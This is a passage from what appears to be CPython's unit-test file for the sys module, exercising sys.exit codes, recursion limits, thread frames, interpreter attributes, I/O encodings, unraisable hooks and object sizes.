self.assertEqual(out, b'')
self.assertEqual(err, b'')
# call with integer argument
with self.assertRaises(SystemExit) as cm:
sys.exit(42)
self.assertEqual(cm.exception.code, 42)
# call with tuple argument with one entry
# entry will be unpacked
with self.assertRaises(SystemExit) as cm:
sys.exit((42,))
self.assertEqual(cm.exception.code, 42)
# call with string argument
with self.assertRaises(SystemExit) as cm:
sys.exit("exit")
self.assertEqual(cm.exception.code, "exit")
# call with tuple argument with two entries
with self.assertRaises(SystemExit) as cm:
sys.exit((17, 23))
self.assertEqual(cm.exception.code, (17, 23))
# test that the exit machinery handles SystemExits properly
rc, out, err = assert_python_failure('-c', 'raise SystemExit(47)')
self.assertEqual(rc, 47)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
def check_exit_message(code, expected, **env_vars):
rc, out, err = assert_python_failure('-c', code, **env_vars)
self.assertEqual(rc, 1)
self.assertEqual(out, b'')
self.assertTrue(err.startswith(expected),
"%s doesn't start with %s" % (ascii(err), ascii(expected)))
# test that stderr buffer is flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the exit message is written with backslashreplace error
# handler to stderr
check_exit_message(
r'import sys; sys.exit("surrogates:\uDCFF")',
b"surrogates:\\udcff")
# test that the unicode message is encoded to the stderr encoding
# instead of the default encoding (utf8)
check_exit_message(
r'import sys; sys.exit("h\xe9")',
b"h\xe9", PYTHONIOENCODING='latin-1')
def test_getdefaultencoding(self):
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_switchinterval(self):
self.assertRaises(TypeError, sys.setswitchinterval)
self.assertRaises(TypeError, sys.setswitchinterval, "a")
self.assertRaises(ValueError, sys.setswitchinterval, -1.0)
self.assertRaises(ValueError, sys.setswitchinterval, 0.0)
orig = sys.getswitchinterval()
# sanity check
self.assertTrue(orig < 0.5, orig)
try:
for n in 0.00001, 0.05, 3.0, orig:
sys.setswitchinterval(n)
self.assertAlmostEqual(sys.getswitchinterval(), n)
finally:
sys.setswitchinterval(orig)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
def test_recursionlimit_recovery(self):
if hasattr(sys, 'gettrace') and sys.gettrace():
self.skipTest('fatal error if run with a trace function')
oldlimit = sys.getrecursionlimit()
def f():
f()
try:
for depth in (50, 75, 100, 250, 1000):
try:
sys.setrecursionlimit(depth)
except RecursionError:
# Issue #25274: The recursion limit is too low at the
# current recursion depth
continue
# Issue #5392: test stack overflow after hitting recursion
# limit twice
with self.assertRaises(RecursionError):
f()
with self.assertRaises(RecursionError):
f()
finally:
sys.setrecursionlimit(oldlimit)
@test.support.cpython_only
def test_setrecursionlimit_recursion_depth(self):
# Issue #25274: Setting a low recursion limit must be blocked if the
# current recursion depth is already higher than limit.
from _testinternalcapi import get_recursion_depth
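# Recurse until the interpreter's recursion depth reaches `depth`, then verify that
# sys.setrecursionlimit(limit) is rejected because the requested limit would be below the current depth.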
def set_recursion_limit_at_depth(depth, limit):
recursion_depth = get_recursion_depth()
if recursion_depth >= depth:
with self.assertRaises(RecursionError) as cm:
sys.setrecursionlimit(limit)
self.assertRegex(str(cm.exception),
"cannot set the recursion limit to [0-9]+ "
"at the recursion depth [0-9]+: "
"the limit is too low")
else:
set_recursion_limit_at_depth(depth, limit)
oldlimit = sys.getrecursionlimit()
try:
sys.setrecursionlimit(1000)
for limit in (10, 25, 50, 75, 100, 150, 200):
set_recursion_limit_at_depth(limit, limit)
finally:
sys.setrecursionlimit(oldlimit)
def test_getwindowsversion(self):
# Raise SkipTest if sys doesn't have getwindowsversion attribute
test.support.get_attribute(sys, "getwindowsversion")
v = sys.getwindowsversion()
self.assertEqual(len(v), 5)
self.assertIsInstance(v[0], int)
self.assertIsInstance(v[1], int)
self.assertIsInstance(v[2], int)
self.assertIsInstance(v[3], int)
self.assertIsInstance(v[4], str)
self.assertRaises(IndexError, operator.getitem, v, 5)
self.assertIsInstance(v.major, int)
self.assertIsInstance(v.minor, int)
self.assertIsInstance(v.build, int)
self.assertIsInstance(v.platform, int)
self.assertIsInstance(v.service_pack, str)
self.assertIsInstance(v.service_pack_minor, int)
self.assertIsInstance(v.service_pack_major, int)
self.assertIsInstance(v.suite_mask, int)
self.assertIsInstance(v.product_type, int)
self.assertEqual(v[0], v.major)
self.assertEqual(v[1], v.minor)
self.assertEqual(v[2], v.build)
self.assertEqual(v[3], v.platform)
self.assertEqual(v[4], v.service_pack)
# This is how platform.py calls it. Make sure tuple
# still has 5 elements
maj, min, buildno, plat, csd = sys.getwindowsversion()
def test_call_tracing(self):
self.assertRaises(TypeError, sys.call_tracing, type, 2)
@unittest.skipUnless(hasattr(sys, "setdlopenflags"),
'test needs sys.setdlopenflags()')
def test_dlopenflags(self):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
@test.support.refcount_test
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.__code__ \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
@threading_helper.reap_threads
def test_current_frames(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
@threading_helper.reap_threads
def test_current_exceptions(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
while True:
try:
raise ValueError("oops")
except ValueError:
if leave_g.wait(timeout=support.LONG_TIMEOUT):
break
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_exceptions()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
self.assertEqual((None, None, None), d.pop(main_id))
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
exc_type, exc_value, exc_tb = d.pop(thread_id)
stack = traceback.extract_stack(exc_tb.tb_frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertTrue(sourceline.startswith("if leave_g.wait("))
# Reap the spawned thread.
leave_g.set()
t.join()
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
for arg in sys.argv:
self.assertIsInstance(arg, str)
self.assertIsInstance(sys.orig_argv, list)
for arg in sys.orig_argv:
self.assertIsInstance(arg, str)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, str)
self.assertIsInstance(sys.exec_prefix, str)
self.assertIsInstance(sys.base_exec_prefix, str)
self.assertIsInstance(sys.executable, str)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.int_info), 2)
self.assertTrue(sys.int_info.bits_per_digit % 5 == 0)
self.assertTrue(sys.int_info.sizeof_digit >= 1)
self.assertEqual(type(sys.int_info.bits_per_digit), int)
self.assertEqual(type(sys.int_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertEqual(len(sys.hash_info), 9)
self.assertLess(sys.hash_info.modulus, 2**sys.hash_info.width)
# sys.hash_info.modulus should be a prime; we do a quick
# probable primality test (doesn't exclude the possibility of
# a Carmichael number)
for x in range(1, 100):
self.assertEqual(
pow(x, sys.hash_info.modulus-1, sys.hash_info.modulus),
1,
"sys.hash_info.modulus {} is a non-prime".format(
sys.hash_info.modulus)
)
self.assertIsInstance(sys.hash_info.inf, int)
self.assertIsInstance(sys.hash_info.nan, int)
self.assertIsInstance(sys.hash_info.imag, int)
algo = sysconfig.get_config_var("Py_HASH_ALGORITHM")
if sys.hash_info.algorithm in {"fnv", "siphash24"}:
self.assertIn(sys.hash_info.hash_bits, {32, 64})
self.assertIn(sys.hash_info.seed_bits, {32, 64, 128})
if algo == 1:
self.assertEqual(sys.hash_info.algorithm, "siphash24")
elif algo == 2:
self.assertEqual(sys.hash_info.algorithm, "fnv")
else:
self.assertIn(sys.hash_info.algorithm, {"fnv", "siphash24"})
else:
# PY_HASH_EXTERNAL
self.assertEqual(algo, 0)
self.assertGreaterEqual(sys.hash_info.cutoff, 0)
self.assertLess(sys.hash_info.cutoff, 8)
self.assertIsInstance(sys.maxsize, int)
self.assertIsInstance(sys.maxunicode, int)
self.assertEqual(sys.maxunicode, 0x10FFFF)
self.assertIsInstance(sys.platform, str)
self.assertIsInstance(sys.prefix, str)
self.assertIsInstance(sys.base_prefix, str)
self.assertIsInstance(sys.platlibdir, str)
self.assertIsInstance(sys.version, str)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
if not sys.platform.startswith('win'):
self.assertIsInstance(sys.abiflags, str)
def test_thread_info(self):
info = sys.thread_info
self.assertEqual(len(info), 3)
self.assertIn(info.name, ('nt', 'pthread', 'solaris', None))
self.assertIn(info.lock, ('semaphore', 'mutex+cond', None))
def test_43581(self):
# Can't use sys.stdout, as this is a StringIO object when
# the test runs under regrtest.
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_intern(self):
global INTERN_NUMRUNS
INTERN_NUMRUNS += 1
self.assertRaises(TypeError, sys.intern)
s = "never interned before" + str(INTERN_NUMRUNS)
self.assertTrue(sys.intern(s) is s)
s2 = s.swapcase().swapcase()
self.assertTrue(sys.intern(s2) is s)
# Subclasses of string can't be interned, because they
# provide too much opportunity for insane things to happen.
# We don't want them in the interned dict and if they aren't
# actually interned, we don't want to create the appearance
# that they are by allowing intern() to succeed.
class S(str):
def __hash__(self):
return 123
self.assertRaises(TypeError, sys.intern, S("abc"))
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug",
"inspect", "interactive", "optimize",
"dont_write_bytecode", "no_user_site", "no_site",
"ignore_environment", "verbose", "bytes_warning", "quiet",
"hash_randomization", "isolated", "dev_mode", "utf8_mode",
"warn_default_encoding")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
attr_type = bool if attr == "dev_mode" else int
self.assertEqual(type(getattr(sys.flags, attr)), attr_type, attr)
self.assertTrue(repr(sys.flags))
self.assertEqual(len(sys.flags), len(attrs))
self.assertIn(sys.flags.utf8_mode, {0, 1, 2})
def assert_raise_on_new_sys_type(self, sys_attr):
# Users are intentionally prevented from creating new instances of
# sys.flags, sys.version_info, and sys.getwindowsversion.
arg = sys_attr
attr_type = type(sys_attr)
with self.assertRaises(TypeError):
attr_type(arg)
with self.assertRaises(TypeError):
attr_type.__new__(attr_type, arg)
def test_sys_flags_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.flags)
def test_sys_version_info_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.version_info)
def test_sys_getwindowsversion_no_instantiation(self):
# Skip if not being run on Windows.
test.support.get_attribute(sys, "getwindowsversion")
self.assert_raise_on_new_sys_type(sys.getwindowsversion())
@test.support.cpython_only
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
expected = ("\xa2" + os.linesep).encode("cp424")
self.assertEqual(out, expected)
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'?')
env["PYTHONIOENCODING"] = "ascii"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = "ascii:"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = ":surrogateescape"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xdcbd))'],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'\xbd')
@unittest.skipUnless(os_helper.FS_NONASCII,
'requires OS support of non-ASCII encodings')
@unittest.skipUnless(sys.getfilesystemencoding() == locale.getpreferredencoding(False),
'requires FS encoding to match locale')
def test_ioencoding_nonascii(self):
env = dict(os.environ)
env["PYTHONIOENCODING"] = ""
p = subprocess.Popen([sys.executable, "-c",
'print(%a)' % os_helper.FS_NONASCII],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, os.fsencode(os_helper.FS_NONASCII))
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable(self):
# sys.executable should be absolute
self.assertEqual(os.path.abspath(sys.executable), sys.executable)
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
# has been set to a non existent program name and Python is unable to
# retrieve the real program name
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c",
'import sys; print(sys.executable.encode("ascii", "backslashreplace"))'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
stdout = p.communicate()[0]
executable = stdout.strip().decode("ASCII")
p.wait()
self.assertIn(executable, ["b''", repr(sys.executable.encode("ascii", "backslashreplace"))])
def check_fsencoding(self, fs_encoding, expected=None):
self.assertIsNotNone(fs_encoding)
codecs.lookup(fs_encoding)
if expected:
self.assertEqual(fs_encoding, expected)
def test_getfilesystemencoding(self):
fs_encoding = sys.getfilesystemencoding()
if sys.platform == 'darwin':
expected = 'utf-8'
else:
expected = None
self.check_fsencoding(fs_encoding, expected)
def c_locale_get_error_handler(self, locale, isolated=False, encoding=None):
# Force the POSIX locale
env = os.environ.copy()
env["LC_ALL"] = locale
env["PYTHONCOERCECLOCALE"] = "0"
code = '\n'.join((
'import sys',
'def dump(name):',
' std = getattr(sys, name)',
' print("%s: %s" % (name, std.errors))',
'dump("stdin")',
'dump("stdout")',
'dump("stderr")',
))
args = [sys.executable, "-X", "utf8=0", "-c", code]
if isolated:
args.append("-I")
if encoding is not None:
env['PYTHONIOENCODING'] = encoding
else:
env.pop('PYTHONIOENCODING', None)
p = subprocess.Popen(args,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=env,
universal_newlines=True)
stdout, stderr = p.communicate()
return stdout
def check_locale_surrogateescape(self, locale):
out = self.c_locale_get_error_handler(locale, isolated=True)
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
# replace the default error handler
out = self.c_locale_get_error_handler(locale, encoding=':ignore')
self.assertEqual(out,
'stdin: ignore\n'
'stdout: ignore\n'
'stderr: backslashreplace\n')
# force the encoding
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1:')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
# these encodings have no effect
out = self.c_locale_get_error_handler(locale, encoding=':')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
def test_c_locale_surrogateescape(self):
self.check_locale_surrogateescape('C')
def test_posix_locale_surrogateescape(self):
self.check_locale_surrogateescape('POSIX')
def test_implementation(self):
# This test applies to all implementations equally.
levels = {'alpha': 0xA, 'beta': 0xB, 'candidate': 0xC, 'final': 0xF}
self.assertTrue(hasattr(sys.implementation, 'name'))
self.assertTrue(hasattr(sys.implementation, 'version'))
self.assertTrue(hasattr(sys.implementation, 'hexversion'))
self.assertTrue(hasattr(sys.implementation, 'cache_tag'))
version = sys.implementation.version
self.assertEqual(version[:2], (version.major, version.minor))
hexversion = (version.major << 24 | version.minor << 16 |
version.micro << 8 | levels[version.releaselevel] << 4 |
version.serial << 0)
self.assertEqual(sys.implementation.hexversion, hexversion)
# PEP 421 requires that .name be lower case.
self.assertEqual(sys.implementation.name,
sys.implementation.name.lower())
@test.support.cpython_only
def test_debugmallocstats(self):
# Test sys._debugmallocstats()
from test.support.script_helper import assert_python_ok
args = ['-c', 'import sys; sys._debugmallocstats()']
ret, out, err = assert_python_ok(*args)
self.assertIn(b"free PyDictObjects", err)
# The function has no parameter
self.assertRaises(TypeError, sys._debugmallocstats, True)
@unittest.skipUnless(hasattr(sys, "getallocatedblocks"),
"sys.getallocatedblocks unavailable on this build")
def test_getallocatedblocks(self):
try:
import _testcapi
except ImportError:
with_pymalloc = support.with_pymalloc()
else:
try:
alloc_name = _testcapi.pymem_getallocatorsname()
except RuntimeError as exc:
# "cannot get allocators name" (ex: tracemalloc is used)
with_pymalloc = True
else:
with_pymalloc = (alloc_name in ('pymalloc', 'pymalloc_debug'))
# Some sanity checks
a = sys.getallocatedblocks()
self.assertIs(type(a), int)
if with_pymalloc:
self.assertGreater(a, 0)
else:
# When WITH_PYMALLOC isn't available, we don't know anything
# about the underlying implementation: the function might
# return 0 or something greater.
self.assertGreaterEqual(a, 0)
try:
# While we could imagine a Python session where the number of
# multiple buffer objects would exceed the sharing of references,
# it is unlikely to happen in a normal test run.
self.assertLess(a, sys.gettotalrefcount())
except AttributeError:
# gettotalrefcount() not available
pass
gc.collect()
b = sys.getallocatedblocks()
self.assertLessEqual(b, a)
gc.collect()
c = sys.getallocatedblocks()
self.assertIn(c, range(b - 50, b + 50))
def test_is_finalizing(self):
self.assertIs(sys.is_finalizing(), False)
# Don't use the atexit module because _Py_Finalizing is only set
# after calling atexit callbacks
code = """if 1:
import sys
class AtExit:
is_finalizing = sys.is_finalizing
print = print
def __del__(self):
self.print(self.is_finalizing(), flush=True)
# Keep a reference in the __main__ module namespace, so the
# AtExit destructor will be called at Python exit
ref = AtExit()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(stdout.rstrip(), b'True')
def test_issue20602(self):
# sys.flags and sys.float_info were wiped during shutdown.
code = """if 1:
import sys
class A:
def __del__(self, sys=sys):
print(sys.flags)
print(sys.float_info)
a = A()
"""
rc, out, err = assert_python_ok('-c', code)
out = out.splitlines()
self.assertIn(b'sys.flags', out[0])
self.assertIn(b'sys.float_info', out[1])
def test_sys_ignores_cleaning_up_user_data(self):
code = """if 1:
import struct, sys
class C:
def __init__(self):
self.pack = struct.pack
def __del__(self):
self.pack('I', -42)
sys.x = C()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(rc, 0)
self.assertEqual(stdout.rstrip(), b"")
self.assertEqual(stderr.rstrip(), b"")
@unittest.skipUnless(hasattr(sys, 'getandroidapilevel'),
'need sys.getandroidapilevel()')
def test_getandroidapilevel(self):
level = sys.getandroidapilevel()
self.assertIsInstance(level, int)
self.assertGreater(level, 0)
def test_sys_tracebacklimit(self):
code = """if 1:
import sys
def f1():
1 / 0
def f2():
f1()
sys.tracebacklimit = %r
f2()
"""
def check(tracebacklimit, expected):
p = subprocess.Popen([sys.executable, '-c', code % tracebacklimit],
stderr=subprocess.PIPE)
out = p.communicate()[1]
self.assertEqual(out.splitlines(), expected)
traceback = [
b'Traceback (most recent call last):',
b' File "<string>", line 8, in <module>',
b' File "<string>", line 6, in f2',
b' File "<string>", line 4, in f1',
b'ZeroDivisionError: division by zero'
]
check(10, traceback)
check(3, traceback)
check(2, traceback[:1] + traceback[2:])
check(1, traceback[:1] + traceback[3:])
check(0, [traceback[-1]])
check(-1, [traceback[-1]])
check(1<<1000, traceback)
check(-1<<1000, [traceback[-1]])
check(None, traceback)
def test_no_duplicates_in_meta_path(self):
self.assertEqual(len(sys.meta_path), len(set(sys.meta_path)))
@unittest.skipUnless(hasattr(sys, "_enablelegacywindowsfsencoding"),
'needs sys._enablelegacywindowsfsencoding()')
def test__enablelegacywindowsfsencoding(self):
code = ('import sys',
'sys._enablelegacywindowsfsencoding()',
'print(sys.getfilesystemencoding(), sys.getfilesystemencodeerrors())')
rc, out, err = assert_python_ok('-c', '; '.join(code))
out = out.decode('ascii', 'replace').rstrip()
self.assertEqual(out, 'mbcs replace')
def test_orig_argv(self):
code = textwrap.dedent('''
import sys
print(sys.argv)
print(sys.orig_argv)
''')
args = [sys.executable, '-I', '-X', 'utf8', '-c', code, 'arg']
proc = subprocess.run(args, check=True, capture_output=True, text=True)
expected = [
repr(['-c', 'arg']), # sys.argv
repr(args), # sys.orig_argv
]
self.assertEqual(proc.stdout.rstrip().splitlines(), expected,
proc)
def test_module_names(self):
self.assertIsInstance(sys.stdlib_module_names, frozenset)
for name in sys.stdlib_module_names:
self.assertIsInstance(name, str)
@test.support.cpython_only
class UnraisableHookTest(unittest.TestCase):
def write_unraisable_exc(self, exc, err_msg, obj):
import _testcapi
import types
err_msg2 = f"Exception ignored {err_msg}"
try:
_testcapi.write_unraisable_exc(exc, err_msg, obj)
return types.SimpleNamespace(exc_type=type(exc),
exc_value=exc,
exc_traceback=exc.__traceback__,
err_msg=err_msg2,
object=obj)
finally:
# Explicitly break any reference cycle
exc = None
def test_original_unraisablehook(self):
for err_msg in (None, "original hook"):
with self.subTest(err_msg=err_msg):
obj = "an object"
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
self.write_unraisable_exc(ValueError(42), err_msg, obj)
err = stderr.getvalue()
if err_msg is not None:
self.assertIn(f'Exception ignored {err_msg}: {obj!r}\n', err)
else:
self.assertIn(f'Exception ignored in: {obj!r}\n', err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('ValueError: 42\n', err)
def test_original_unraisablehook_err(self):
# bpo-22836: PyErr_WriteUnraisable() should give sensible reports
class BrokenDel:
def __del__(self):
exc = ValueError("del is broken")
# The following line is included in the traceback report:
raise exc
class BrokenStrException(Exception):
def __str__(self):
raise Exception("str() is broken")
class BrokenExceptionDel:
def __del__(self):
exc = BrokenStrException()
# The following line is included in the traceback report:
raise exc
for test_class in (BrokenDel, BrokenExceptionDel):
with self.subTest(test_class):
obj = test_class()
with test.support.captured_stderr() as stderr, \
test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
# Trigger obj.__del__()
del obj
report = stderr.getvalue()
self.assertIn("Exception ignored", report)
self.assertIn(test_class.__del__.__qualname__, report)
self.assertIn("test_sys.py", report)
self.assertIn("raise exc", report)
if test_class is BrokenExceptionDel:
self.assertIn("BrokenStrException", report)
self.assertIn("<exception str() failed>", report)
else:
self.assertIn("ValueError", report)
self.assertIn("del is broken", report)
self.assertTrue(report.endswith("\n"))
def test_original_unraisablehook_wrong_type(self):
exc = ValueError(42)
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
with self.assertRaises(TypeError):
sys.unraisablehook(exc)
def test_custom_unraisablehook(self):
hook_args = None
def hook_func(args):
nonlocal hook_args
hook_args = args
obj = object()
try:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
expected = self.write_unraisable_exc(ValueError(42),
"custom hook", obj)
for attr in "exc_type exc_value exc_traceback err_msg object".split():
self.assertEqual(getattr(hook_args, attr),
getattr(expected, attr),
(hook_args, expected))
finally:
# expected and hook_args contain an exception: break reference cycle
expected = None
hook_args = None
def test_custom_unraisablehook_fail(self):
def hook_func(*args):
raise Exception("hook_func failed")
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
self.write_unraisable_exc(ValueError(42),
"custom hook fail", None)
err = stderr.getvalue()
self.assertIn(f'Exception ignored in sys.unraisablehook: '
f'{hook_func!r}\n',
err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('Exception: hook_func failed\n', err)
@test.support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.P = struct.calcsize('P')
self.longdigit = sys.int_info.sizeof_digit
import _testinternalcapi
self.gc_headsize = _testinternalcapi.SIZEOF_PYGC_HEAD
check_sizeof = test.support.check_sizeof
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
vsize = test.support.calcvobjsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), vsize('') + self.longdigit)
# but lists are
self.assertEqual(sys.getsizeof([]), vsize('Pn') + gc_header_size)
def test_errors(self):
class BadSizeof:
def __sizeof__(self):
raise ValueError
self.assertRaises(ValueError, sys.getsizeof, BadSizeof())
class InvalidSizeof:
def __sizeof__(self):
return None
self.assertRaises(TypeError, sys.getsizeof, InvalidSizeof())
sentinel = ["sentinel"]
self.assertIs(sys.getsizeof(InvalidSizeof(), sentinel), sentinel)
class FloatSizeof:
def __sizeof__(self):
return 4.5
self.assertRaises(TypeError, sys.getsizeof, FloatSizeof())
self.assertIs(sys.getsizeof(FloatSizeof(), sentinel), sentinel)
class OverflowSizeof(int):
def __sizeof__(self):
return int(self)
self.assertEqual(sys.getsizeof(OverflowSizeof(sys.maxsize)),
sys.maxsize + self.gc_headsize)
with self.assertRaises(OverflowError):
sys.getsizeof(OverflowSizeof(sys.maxsize + 1))
with self.assertRaises(ValueError):
sys.getsizeof(OverflowSizeof(-1))
with self.assertRaises((ValueError, OverflowError)):
sys.getsizeof(OverflowSizeof(-sys.maxsize - 1))
def test_default(self):
size = test.support.calcvobjsize
self.assertEqual(sys.getsizeof(True), size('') + self.longdigit)
